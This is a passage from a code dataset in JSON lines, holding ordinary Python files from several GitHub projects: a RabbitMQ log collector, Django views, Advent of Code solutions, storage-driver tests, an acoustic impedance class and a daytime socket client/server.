\"https://{0}.s3.amazonaws.com/{1}\".format(environment.AWS_S3_BUCKET_EXPORT, filename)\n except Exception as e:\n print(\"---------------------------------------------\")\n print(\"---------------------------------------------\")\n print(e)\n print(\"---------------------------------------------\")\n print(\"---------------------------------------------\")\n return 'ERROR: ' + str(e)\n","repo_name":"julio9246/hg-poker-api","sub_path":"source/helpers/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30670771366","text":"import json\nimport logging\nimport textwrap\n\nimport pika\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom mettle.settings import get_settings\nfrom mettle.models import JobLogLine\nimport mettle_protocol as mp\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\ndef main():\n settings = get_settings()\n\n rabbit_conn = pika.BlockingConnection(pika.URLParameters(settings.rabbit_url))\n rabbit = rabbit_conn.channel()\n mp.declare_exchanges(rabbit)\n queue_name = 'mettle_job_logs'\n rabbit.queue_declare(queue=queue_name, exclusive=False,\n durable=True)\n rabbit.queue_bind(exchange=mp.JOB_LOGS_EXCHANGE,\n queue=queue_name, routing_key='#')\n logger.info('Bound exchange %s to queue %s' % (mp.JOB_LOGS_EXCHANGE,\n queue_name))\n\n engine = create_engine(settings.db_url, echo=False)\n Session = sessionmaker(bind=engine)\n for method, properties, body in rabbit.consume(queue=queue_name):\n db = Session()\n data = json.loads(body)\n job_id = data['job_id']\n line_num = data['line_num']\n message = data['msg']\n try:\n db.add(JobLogLine(\n job_id=job_id,\n line_num=line_num,\n message=message,\n ))\n db.commit()\n logger.info(message)\n except IntegrityError:\n # We probably got a duplicate log line, which can happen given\n # Rabbit retries. Query DB for log line matching job_id and\n # line_num. If we have one, and it is the same message, then just\n # carry on. If the message is different, then log an error.\n db.rollback()\n existing_line = db.query(JobLogLine).filter_by(job_id=job_id,\n line_num=line_num).one()\n if existing_line.message != message:\n err = \"\"\"Job {job_id}, log line {num} is stored as\n this:\\n{old}\\n\\n but the queue has just produced a new message\n for the same line, with this value:\\n{new}\"\"\"\n\n\n logger.error(textwrap.dedent(err).format(\n job_id=job_id,\n num=line_num,\n old=existing_line.message,\n new=message,\n ))\n finally:\n db.close()\n engine.dispose()\n \n rabbit.basic_ack(method.delivery_tag)\n\nif __name__ == '__main__':\n main()\n","repo_name":"yougov/mettle","sub_path":"mettle/logcollector.py","file_name":"logcollector.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"26478126608","text":"import os\nfrom django.conf import settings\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views.generic import DetailView\nfrom .forms import PostForm\nfrom .models import Post\n\n\npost_detail = DetailView.as_view(model=Post)\n\n\ndef post_new(request):\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n # 방법1)\n '''\n post = Post()\n post.title = form.cleaned_data['title']\n post.content = form.cleaned_data['content']\n post.save()\n '''\n\n # 방법2)\n \"\"\"\n post = Post(title = form.cleaned_data['title'],\n content = form.cleaned_data['content'])\n post.save()\n \"\"\"\n\n # 방법3)\n '''\n Post.objects.create(title = form.cleaned_data['title'],\n content = form.cleaned_data['content'])\n '''\n\n # 방법4)\n '''\n Post.objects.create(**form.cleaned_data)\n '''\n post = form.save(commit=False)\n post.ip = request.META['REMOTE_ADDR']\n post.save()\n return redirect('dojo:post_list')\n else:\n form = PostForm()\n\n return render(request, 'dojo/post_new.html', {\n 'form': form,\n })\n\n\ndef post_edit(request, id):\n post = get_object_or_404(Post, id=id)\n\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.ip = request.META['REMOTE_ADDR']\n post.save()\n return redirect('dojo:post_list')\n else:\n form = PostForm(instance=post)\n \n return render(request, 'dojo/post_new.html', {\n 'form': form,\n })\n\ndef mysum(request, numbers):\n # numbers = [int(num) for num in numbers.split(\"/\")]\n # result = sum(map(int, numbers.split(\"/\")))\n result = sum(map(lambda s: int(s or 0), numbers.split(\"/\")))\n return HttpResponse(result)\n\n\ndef hello(request, name, age):\n return HttpResponse(\"안녕하세요, {}, {}살 이시네요\".format(name, age))\n\n\ndef post_list(request):\n return render(request, 'dojo/layout.html')\n\n\ndef post_list1(request):\n name = \"Ben\"\n return HttpResponse(\"\"\"

Hello {name}

\n

welcome to the your World\"\"\".format(name=name)\n )\n\n\ndef post_list2(request):\n name = {\"name\": \"Ben\"}\n response = render(request, \"dojo/post_list2.html\", name)\n return response\n\n\ndef post_list3(request):\n json_response = JsonResponse({\n \"items\": [\"python\", \"django\", \"data\", \"algorithm\"],\n \"message\": \"road to python and django developer\",\n }, json_dumps_params={\"ensure_ascii\": False})\n return json_response\n\n\ndef excel_download(request):\n filepath = os.path.join(settings.BASE_DIR, \"hotfoot-software.xls\")\n filename = os.path.basename(filepath)\n with open(filepath, \"rb\") as f:\n response = HttpResponse(f, content_type='application/vnd.ms-excel') # content_type(MIME type) default = text/html\n response['Content-disposition'] = 'attachment; filename=\"{}\"'.format(filename)\n return response","repo_name":"bufpal/start_django","sub_path":"dojo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4994064827","text":"from collections import defaultdict\nimport re\nimport math\nimport numpy as np\nfrom numpy.core.fromnumeric import sort\nfrom collections import deque\n\nwith open(\"input.dat\", \"r\") as file:\n lines = [list(line.strip()) for line in file.readlines()]\n\nillegal_points = 0\nillPointDict = {')':3, ']':57, '}':1197, '>':25137}\nfor line in lines:\n stack = deque()\n\n for i, bracket in enumerate(line):\n if i == 0:\n stack.append(bracket)\n continue\n\n if len(stack) > 0 and [stack[-1], bracket] in [['{', '}'], ['[', ']'], ['(', ')'], ['<', '>']]:\n stack.pop()\n continue\n \n stack.append(bracket)\n\n if len(stack) > 0:\n for b in stack:\n # find illegal char\n if b in illPointDict.keys():\n illegal_points += illPointDict[b]\n break\n \nprint(illegal_points)\n\n\n# PART2\ndef closeme(bracket):\n if bracket == \"{\": return \"}\"\n if bracket == \"[\": return \"]\"\n if bracket == \"<\": return \">\"\n if bracket == \"(\": return \")\"\n\n\npointslist = []\npointsDict = {')':1, ']':2, '}':3, '>':4}\nfor line in lines:\n\n stack = deque()\n\n for i, bracket in enumerate(line):\n if i == 0:\n stack.append(bracket)\n continue\n\n if len(stack) > 0 and [stack[-1], bracket] in [['{', '}'], ['[', ']'], ['(', ')'], ['<', '>']]:\n stack.pop()\n continue\n \n stack.append(bracket)\n\n isIllegal = False\n if len(stack) > 0:\n for i, b in enumerate(stack):\n if b in pointsDict.keys():\n isIllegal = True\n break\n\n # line is illegal\n if isIllegal: continue\n\n # line is legal\n bstring = [closeme(stack.pop()) for _ in range(len(stack))]\n \n points = 0\n for b in bstring:\n points *= 5\n points += pointsDict[b]\n pointslist.append(points)\n\nprint(int(np.median(pointslist)))","repo_name":"benjaminorthner/adventofcode","sub_path":"2021/10/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21721437269","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport random\nimport string\nimport StringIO\n\nfrom docker_registry.core import driver\nfrom docker_registry.core import exceptions\nfrom docker_registry import testing\n\nfrom nose import tools\n\nlogger = logging.getLogger(__name__)\n\nGOOD_REMOTE = \"localhost:1025:2\"\nBAD_REMOTE = \"localhost:1100:2-0\"\n\n\nclass TestQuery(testing.Query):\n def __init__(self):\n self.scheme = 'elliptics'\n\n\nclass TestDriver(testing.Driver):\n def __init__(self):\n self.scheme = 'elliptics'\n self.path = ''\n self.config = testing.Config({'elliptics_nodes': GOOD_REMOTE})\n\n @tools.raises(exceptions.FileNotFoundError)\n def test_remove_inexistent_path(self):\n filename = self.gen_random_string()\n self._storage.remove(\"/\".join((filename, filename)))\n\n\nclass TestBorderDriverCases(object):\n def __init__(self):\n self.scheme = 'elliptics'\n self.path = ''\n self.config = testing.Config({'elliptics_nodes': GOOD_REMOTE,\n 'elliptics_groups': [999, 1000]})\n\n def gen_random_string(self, length=16):\n return ''.join([random.choice(string.ascii_uppercase + string.digits)\n for x in range(length)]).lower()\n\n def setUp(self):\n storage = driver.fetch(self.scheme)\n self._storage = storage(self.path, self.config)\n\n @tools.raises(exceptions.FileNotFoundError)\n def test_s_remove(self):\n filename = self.gen_random_string()\n self._storage.s_remove(filename)\n\n @tools.raises(exceptions.UnspecifiedError)\n def test_s_write(self):\n filename = self.gen_random_string()\n tag = self.gen_random_string(length=5)\n self._storage.s_write(filename, \"dummycontent\", (tag,))\n\n @tools.raises(exceptions.UnspecifiedError)\n def test_s_append(self):\n filename = self.gen_random_string()\n self._storage.s_append(filename, \"dummycontent\")\n\n\nclass TestWriteStreaming(object):\n def __init__(self):\n self.scheme = 'elliptics'\n self.path = ''\n self.config = testing.Config({'elliptics_nodes': GOOD_REMOTE})\n\n def setUp(self):\n storage = driver.fetch(self.scheme)\n self._storage = storage(self.path, self.config)\n\n def gen_random_string(self, length=16):\n return ''.join([random.choice(string.ascii_uppercase + string.digits)\n for x in range(length)]).lower()\n\n def test_s_stream_write_many_chunks(self):\n # decrease buffer size to\n self._storage.buffer_size = 100\n filename = self.gen_random_string(length=10)\n path = \"/\".join((filename, filename))\n fakedata = self.gen_random_string(length=201)\n fakefile = StringIO.StringIO(fakedata)\n self._storage.stream_write(path, fakefile)\n assert self._storage.get_content(path) == fakedata\n\n\ndef _set_up_with_config(config):\n config = testing.Config(config)\n d = testing.Driver(scheme='elliptics',\n config=config)\n d.setUp()\n return d\n\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_no_nodes_conf():\n _set_up_with_config({})\n\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_wrong_nodes_type_conf():\n _set_up_with_config({'elliptics_nodes': 1111111})\n\n\n@tools.raises(exceptions.ConnectionError)\ndef test_elliptics_bad_nodes_conf():\n _set_up_with_config({'elliptics_nodes': [BAD_REMOTE]})\n\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_zero_groups_conf():\n _set_up_with_config({'elliptics_groups': []})\n\n@tools.raises(exceptions.ConfigError)\ndef test_elliptics_invalid_verbosity_conf():\n groups = [1, 2, 3]\n _set_up_with_config({'elliptics_groups': groups,\n 'elliptics_nodes': GOOD_REMOTE,\n 'elliptics_verbosity': 'blabla'})\n\ndef test_elliptics_groups_conf():\n groups = [1, 2, 3]\n dr = _set_up_with_config({'elliptics_groups': groups,\n 'elliptics_nodes': GOOD_REMOTE})\n assert sorted(dr._storage._session.groups) == sorted(groups)\n\n groups_as_string = \"[1, 2,3]\"\n dr = _set_up_with_config({'elliptics_groups': groups_as_string,\n 'elliptics_nodes': GOOD_REMOTE})\n assert sorted(dr._storage._session.groups) == sorted(groups)\n","repo_name":"noxiouz/docker-registry-driver-elliptics","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"24660845998","text":"import itertools\nimport functools\n\ndef calculate_ribbon_needed(box):\n dimensions = [int(x) for x in box.split('x')]\n ribbon = sum([2*x for x in sorted(dimensions)[:2]]) + functools.reduce(lambda x,y: x*y, dimensions)\n return ribbon\n\ndef calculate_wrapping_paper_needed(box):\n dimensions = [int(x) for x in box.split('x')]\n combinations = list(itertools.combinations(dimensions, 2))\n raw_packing = [2*x*y for x,y in combinations]\n packing = sum(raw_packing) + min(raw_packing)//2\n return packing\n\nwith open('C:\\\\Users\\\\dider\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python39\\\\AoC 2015\\\\input\\\\day2.txt', 'r') as file:\n data = file.read().splitlines()\n print('Part 1: {}'.format(sum([calculate_wrapping_paper_needed(box) for box in data])))\n print('Part 2: {}'.format(sum([calculate_ribbon_needed(box) for box in data])))\n","repo_name":"Diderikdm/Advent-of-Code-2015","sub_path":"day 02 - part 1 & 2.py","file_name":"day 02 - part 1 & 2.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31042281889","text":"from flask import Blueprint, app, render_template, redirect,request, jsonify, make_response, Response\nfrom flask_login import login_required, current_user\nfrom .models import Comments, User, Posts, Likes\nfrom . import db\nimport json\nfrom base64 import b64encode\n\nviews = Blueprint('views', __name__)\n\n@views.route('/home', methods=['GET', 'POST'])\n@login_required\ndef home():\n \n print(current_user)\n if request.method == 'POST':\n post = request.form.get('post')\n post=post.replace(\"[sp]\", \" \")\n post=post.replace(\"[n1]\", \"\\n\")\n print(post)\n\n if len(post)<1:\n return render_template(\"home.html\", user=current_user)\n \n else:\n new_post = Posts(data=post, user_id = current_user.id)\n \n db.session.add(new_post)\n db.session.commit()\n\n\n \n return render_template(\"home.html\", user=current_user)\n\n\n\n@views.route('/feeds', methods= ['GET','POST'])\n@login_required\ndef timeline():\n \n\n posts_liked=[]\n \n for likes in Likes.query.all() :\n if current_user.id == likes.user :\n posts_liked.append(likes.post_id)\n \n return render_template(\"timeline.html\", user=current_user, posts=Posts.query.all(), user_list=User.query.all(), likes= posts_liked)\n\n\n\n@views.route('/remove-post', methods= ['POST'])\ndef remove_post():\n post = json.loads(request.data)\n postId = post['PostId']\n post = Posts.query.get(postId)\n if post:\n if post.user_id == current_user.id:\n db.session.delete(post)\n db.session.commit()\n \n return jsonify({})\n\n\n@views.route('/like-post', methods= ['POST'])\ndef like_post():\n \n like = json.loads(request.data)\n \n postId = like['PostId']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n post.no_of_likes += 1\n \n \n like = Likes(user=current_user.id , post_id= postId)\n \n db.session.add(like)\n db.session.commit()\n \n return jsonify({})\n\n\n@views.route('/dislike-post', methods= ['POST'])\ndef dislike_post():\n \n dislike = json.loads(request.data)\n \n postId = dislike['PostId']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n for like in post.likes :\n if(current_user.id == like.user):\n db.session.delete(like)\n post.no_of_likes -= 1\n db.session.commit()\n \n \n\n \n \n return jsonify({})\n\n@views.route('/comment', methods= ['POST'])\ndef comment():\n \n comments = json.loads(request.data)\n \n postId, data = comments['PostId'] , comments['data']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n post.no_of_comments += 1\n \n \n comment = Comments(user=current_user.id , data= data , post_id= postId)\n \n db.session.add(comment)\n db.session.commit()\n \n return jsonify({})\n\n\n@views.route('/remove-comment', methods= ['POST'])\ndef remove_comment():\n \n comment = json.loads(request.data)\n \n postId = comment['PostId']\n \n posts=Posts.query.all()\n for post in posts :\n if post.id == postId:\n for comment in post.comments :\n if(current_user.id == comment.user):\n db.session.delete(comment)\n post.no_of_comments -= 1\n db.session.commit()\n \n \n\n \n \n return jsonify({})\n\n@views.route('/profilepic/')\ndef profilepic(id):\n event = User.query.filter_by(id=id).first()\n print(\"hey\")\n image=b64encode(event.profile_pic)\n return (image)","repo_name":"RishiKr3101/Edugo","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31539245939","text":"# LL: 〇〇法が思いついても、シンプルなやり方がないか考えてみる\n# DAG判定\n# トポロジカルソート\n\nimport sys\n\nsys.setrecursionlimit(200000)\n\n\n# 1-based\ndef is_DAG(G):\n def has_cycle(v):\n if cache[v] is not None:\n return cache[v]\n\n if visited[v]:\n return True\n\n visited[v] = True\n\n result = False\n for next_v in G[v]:\n if has_cycle(next_v):\n result = True\n break\n\n cache[v] = result\n return result\n\n N = len(G) - 1\n visited = [None] + [False] * N\n cache = [None] + [None] * N\n\n for v in range(1, N + 1):\n if has_cycle(v):\n return False\n return True\n\n\n# 1-based, return None if G is notDAG\ndef topological_sort(G):\n def rec(v):\n visited[v] = True\n for next_v in G[v]:\n if visited[next_v]:\n continue\n rec(next_v)\n order.append(v)\n\n if not is_DAG(G):\n return None\n\n N = len(G) - 1\n visited = [None] + [False] * N\n\n order = []\n for v in range(1, N + 1):\n if visited[v]:\n continue\n rec(v)\n\n return list(reversed(order))\n\n\ndef who_is_saikyo_mine(N, M, G):\n if len([g for g in G[1:] if len(g) == 0]) != 1:\n return -1\n\n t = topological_sort(G)\n if t is None:\n return -1\n return t[-1]\n\n\ndef who_is_saikyo_editorial(N, M, G):\n strongest = [None] + [1] * N\n\n for weaker in G[1:]:\n strongest[weaker] = 0\n\n if sum(strongest) != 1:\n return -1\n\n return strongest.index(1)\n\n\ndef resolve_mine():\n N, M = [int(e) for e in sys.stdin.readline().split()]\n G = [None] + [[] for _ in range(N)]\n for _ in range(M):\n a, b = [int(e) for e in sys.stdin.readline().split()]\n G[b].append(a)\n print(who_is_saikyo_mine(N, M, G))\n\n\ndef resolve():\n N, M = [int(e) for e in sys.stdin.readline().split()]\n strongest = [None] + [1] * N\n\n for _ in range(M):\n stronger, weaker = [int(e) for e in sys.stdin.readline().split()]\n strongest[weaker] = 0\n\n if sum(strongest[1:]) != 1:\n print(-1)\n else:\n print(strongest.index(1))\n\n\n# resolve()\n# exit()\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_1(self):\n input = \"\"\"3 3\n1 2\n2 3\n3 1\"\"\"\n output = \"\"\"-1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_1(self):\n input = \"\"\"3 2\n1 2\n2 3\"\"\"\n output = \"\"\"1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"3 2\n1 3\n2 3\"\"\"\n output = \"\"\"-1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_3(self):\n input = \"\"\"6 6\n1 6\n6 5\n6 2\n2 3\n4 3\n4 2\"\"\"\n output = \"\"\"-1\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"koba925/alds","sub_path":"atcoder/ABC313/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37807696265","text":"import pylab as pl\nimport numpy as np\nimport string\nfrom . import PeakFinder as pk\nimport os\n\n\nclass Impedance(object):\n \"\"\"\n Impedance object containing impedance at a set of frequencies\n \"\"\"\n \n def __init__(self, freq=None, imped=None):\n if imped is not None:\n self.imped = imped\n else:\n self.imped = np.array([])\n\n if freq is not None:\n assert len(freq) == len(self.imped), \\\n \"Frequency (%s) and impedance (%s) are not same size\" % (\n freq.shape, self.imped.shape)\n self.freq = freq\n else:\n self.freq = np.linspace(0,0.5,len(self.imped))\n\n def set_name(self,name):\n self.name=name\n \n def get_name(self):\n return self.name\n \n def add_suffix_to_name(self, suf='Corr'):\n cur = self.get_name()\n sufst = str.find(cur,'-'+suf)\n if self.dernum > 0:\n basename = cur[0:sufst]\n remaining = cur[sufst+len(suf)+2:]\n n = self.dernum\n newname = (cur[0:sufst] + '-%s-%d')%(suf, n)\n else:\n newname = (cur + '-%s')%(suf)\n \n self.dernum += 1\n self.set_name(newname)\n \n def GuessNominalFreqFromFileName(self):\n '''tries to guess note frequency from the file name\n '''\n \n import aubio\n import re\n \n tokens=re.findall('([A-Ga-g][sS#bB+-]*\\d+)',self.name)\n \n try:\n notename=re.sub('s','#',tokens[0])\n f=aubio.miditofreq(aubio.note2midi(notename))\n except (ValueError,IndexError):\n f=np.NaN\n \n return f\n \n def copy(self):\n '''Create a new object with the same values as this one'''\n import copy\n \n return copy.deepcopy(self)\n \n def correctImpedance(self, g=lambda x,y : x):\n ''' Apply a function g to correct the measured impedance\n the format of g is g(Zi,f), where Zi is the measured impedance\n and f the frequency'''\n \n newimp = self.copy()\n \n zraw = self.getImpedance()\n f = self.getFrequencyVect()\n \n newimp.z = g(zraw,f)\n newimp.add_suffix_to_name(suf='Corr')\n \n return newimp\n \n def addParallelMouthpiece(self, vol = 3.5e-7, mass = 4500.0, res = 0.0):\n ''' Calculate the \"Impedance seen by the mouthpiece flow\", \n given the reed parameters:\n * vol: equivalent volume of the reed (acoustic) \n * mass: equivalent acoustic mass of the reed\n * res: equivalent acoustic resistance\n '''\n \n # reed equivalent volume\n eqvol = vol\n gamma=1.4\n p0=1.013e5\n eqc = eqvol / ( gamma * p0 )\n # reed equivalent resistance\n eqr = res\n # reed acoustic mass\n eqm = mass\n \n # reed impedance\n zreed = lambda ff: 1./(1j*2.*np.pi*ff*eqc) + eqr + 1j*2.*np.pi*ff*eqm\n g = lambda zi,ff: 1./zi + 1./zreed(ff)\n \n newimp = self.correctImpedance()\n \n return newimp.getImpedance()\n \n def getImpedance(self):\n return self.imped.squeeze()\n\n def getFrequencyVect(self):\n return self.freq\n\n \n def findPeaks(self):\n '''Finds the frequencies and values of impedance maxima\n '''\n \n f = self.freq\n pf=pk.PeakFinder(abs(self.imped))\n pf.refine_all(rad=3,logarithmic=True)\n pf.filter_by_salience(rad=5)\n \n fpk = np.interp(pf.get_pos(),np.arange(len(f)),f)\n zpk = np.interp(pf.get_pos(),np.arange(len(f)),abs(self.imped.squeeze()))\n\n return fpk,zpk, pf.get_q()\n\n def findZeroPh(self, direction=-1):\n '''Finds the frequencies at which the phase is 0\n * default, find zero crossings with negative slope\n * direction=+1 finds those with positive slope\n '''\n \n f = self.getFrequencyVect()\n z = self.getImpedance()\n za = np.angle(z)*direction\n \n zci=np.nonzero(np.all((za[:-1]<0.,za[1:]>0.),axis=0))\n azcf = []\n for ii in zci:\n azcf.append((f[ii]-(f[ii+1]-f[ii])/(za[ii+1]-za[ii])*za[ii]))\n \n zcf = np.array(azcf).squeeze()\n\n return zcf,np.interp(zcf,f,np.abs(z))\n\n \n def findPeaksCorrected(self, vol = 3.5e-7, mass = 4500.0, res = 0.0):\n import PeakFinder as pk\n \n f = self.f\n z = self.addParallelMouthpiece(vol=vol,mass=mass,res=res)\n pf=pk.PeakFinder(abs(z))\n pf.refine_all(rad=3,logarithmic=True)\n pf.filter_by_salience(rad=5)\n \n fpk = np.interp(pf.get_pos(),np.arange(len(f)),f)\n zpk = np.interp(pf.get_pos(),np.arange(len(f)),abs(z))\n\n return fpk,zpk\n \n def estimate_modal_expansion(self, **kwargs):\n \"\"\"\n Perform the estimation of a modal expansion of the loaded data.\n \n (part of Moreesc by F. Silva:\n http://moreesc.lma.cnrs-mrs.fr/)\n\n Parameters\n ==========\n algorithm : str 'Kennelly' or 'bruteforce'\n Algorithm used to compute the modal expansion.\n kwargs : passed to computational routines.\n \"\"\"\n kwargs['output_snCn'] = True\n method = kwargs.pop('algorithm', 'Kennelly')\n from . import ModalExpansionEstimation as mod\n\n freq, valZ = self.frequencies, self.values\n fmin = kwargs.pop('fmin', self.frequencies[0])\n fmax = kwargs.pop('fmax', self.frequencies[-1])\n mask_opt = np.logical_and(freq > fmin, freq < fmax)\n freq, valZ = freq[mask_opt], valZ[mask_opt]\n\n if method.lower() == 'kennelly':\n tmp = mod.multiple_circles(freq, valZ, **kwargs)\n print(\"Kennelly fitting is over, please check the result!\")\n self.poles, self.residues = tmp\n elif method.lower() == 'bruteforce':\n flag, tmp = mod.bruteforce_optimization(freq, valZ, **kwargs)\n if flag:\n print('Modal expansion estimation seems successful.')\n self.poles, self.residues = tmp\n else:\n print('Modal expansion estimation not successful...')\n self.poles, self.residues = np.array([]), np.array([])\n else:\n raise NotImplementedError('Algorithm %s does not exist.' % method)\n\n # Remove active modes\n idx = (self.poles.real <= 0.)\n self.poles = self.poles[idx]\n self.residues = self.residues[idx]\n self.nbmodes = len(self.poles)\n\n def plotAbsAngle(self,fig=None):\n if fig is None:\n fig=pl.figure()\n else:\n if type(fig) is int:\n fig = pl.figure(fig)\n else:\n fig=pl.figure(fig.number)\n ax1=pl.subplot(211)\n pl.hold(True)\n pl.plot(self.f,20*np.log10(np.abs(self.z)),label=self.name)\n pl.xlabel('Frequency (Hz)')\n pl.ylabel('Module (dB)')\n \n pl.subplot(212,sharex=ax1)\n pl.hold(True)\n pl.plot(self.f,(np.angle(self.z)),label=self.name)\n pl.xlabel('Frequency (Hz)')\n pl.ylabel('Argument (rad)')\n \n pl.legend()\n \n return fig\n\n","repo_name":"goiosunsw/ImpedancePython","sub_path":"pympedance/_impedance.py","file_name":"_impedance.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"14753183262","text":"#!/usr/bin/env python3\n\nimport argparse\nimport fcntl\nimport ipaddress\nimport signal\nimport socket\nimport struct\nimport sys\nimport time\n\nSIOCGIFADDR = 0x8915\nSIOCGIFADDR_SLICE = (20, 24)\n\nparser = argparse.ArgumentParser(\n description='Daytime Server&Client, by IPv4&IPv6, TCP&UDP.',\n usage='%(prog)s [-h] [-cs] [-46] [-UT] [-p PORT]'\n ' [-i INTERFACE] [-t TIMEOUT] ADDRESS')\nparser.add_argument('-c',\n action='store_const',\n dest='mode',\n const='client',\n help='Mode: Client')\nparser.add_argument('-s',\n action='store_const',\n dest='mode',\n const='server',\n help='Mode: Server')\nparser.add_argument('-4',\n action='store_const',\n dest='family',\n const=socket.AF_INET,\n help='Family: IPv4')\nparser.add_argument('-6',\n action='store_const',\n dest='family',\n const=socket.AF_INET6,\n help='Family: IPv6')\nparser.add_argument('-U',\n action='store_const',\n dest='socktype',\n const=socket.SOCK_DGRAM,\n help='Type: UDP')\nparser.add_argument('-T',\n action='store_const',\n dest='socktype',\n const=socket.SOCK_STREAM,\n help='Type: TCP')\nparser.add_argument('-p', '--port', default='13', help='TCP|UDP Port')\nparser.add_argument('-i', '--interface', help='Interface')\nparser.add_argument('-t',\n '--timeout',\n type=int,\n default=1,\n help='UDP Client Timeout')\nparser.add_argument('address', help='IP Address')\nargs = parser.parse_args()\n\nmode = args.mode or 'server'\nfamily = args.family or socket.AF_INET\nsocktype = args.socktype or socket.SOCK_DGRAM\nep = socket.getaddrinfo(args.address, args.port, family=family,\n type=socktype)[0][-1]\ninterface = args.interface\ntimeout = args.timeout\n\n\ndef client():\n sockfd = socket.socket(family, socktype)\n if interface:\n sockfd.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE,\n interface.encode())\n if socktype == socket.SOCK_STREAM:\n sockfd.connect(ep)\n sys.stdout.buffer.write(sockfd.recv(4096))\n elif socktype == socket.SOCK_DGRAM:\n if family == socket.AF_INET and ep[0] == '255.255.255.255':\n sockfd.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sockfd.sendto(b'\\x00', ep)\n if timeout > 0:\n signal.signal(signal.SIGALRM, lambda _no, _f: sys.exit(0))\n signal.alarm(timeout)\n while True:\n buf, servep = sockfd.recvfrom(4096)\n sys.stdout.buffer.write(\n f'recvfrom {servep[0]}, port {servep[1]}: '.encode())\n sys.stdout.buffer.write(buf)\n sys.stdout.flush()\n sockfd.close()\n\n\ndef server():\n sockfd = socket.socket(family, socktype)\n servep = ep\n if family == socket.AF_INET:\n if ipaddress.IPv4Address(ep[0]).is_multicast:\n ifaddr = b'\\x00\\x00\\x00\\x00'\n if interface:\n ifaddr = fcntl.ioctl(\n sockfd, SIOCGIFADDR,\n struct.pack('64s',\n interface.encode()))[SIOCGIFADDR_SLICE[0],\n SIOCGIFADDR_SLICE[1]]\n sockfd.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,\n socket.inet_pton(socket.AF_INET, ep[0]) + ifaddr)\n servep = ('', ep[1])\n elif family == socket.AF_INET6:\n if ipaddress.IPv6Address(ep[0]).is_multicast:\n ifindex = 0\n if interface:\n ifindex = socket.if_nametoindex(interface)\n sockfd.setsockopt(\n socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP,\n socket.inet_pton(socket.AF_INET6, ep[0]) +\n struct.pack('@i', ifindex))\n servep = ('', ep[1])\n sockfd.bind(servep)\n if socktype == socket.SOCK_STREAM:\n sockfd.listen()\n signal.signal(signal.SIGINT, lambda _no, _f: sys.exit(0))\n while True:\n if socktype == socket.SOCK_STREAM:\n clifd, cliep = sockfd.accept()\n print(f'accept {cliep[0]}, port {cliep[1]}')\n clifd.send(f'{time.ctime()}\\r\\n'.encode())\n clifd.close()\n elif socktype == socket.SOCK_DGRAM:\n _, cliep = sockfd.recvfrom(4096)\n print(f'recvfrom {cliep[0]}, port {cliep[1]}')\n sockfd.sendto(f'{time.ctime()}\\n'.encode(), cliep)\n\n\nif mode == 'client':\n client()\nelif mode == 'server':\n server()\n","repo_name":"vhqr0/zzuexp","sub_path":"unp/serv.py","file_name":"serv.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30257070891","text":"__all__ = [\"download_job\"]\r\n\r\nimport asyncio\r\nimport aiohttp\r\nimport pandas as pd\r\nimport io\r\nfrom typing import List, Dict, Any\r\n\r\n\r\ndef get_timestamp_today():\r\n\r\n # Get today's 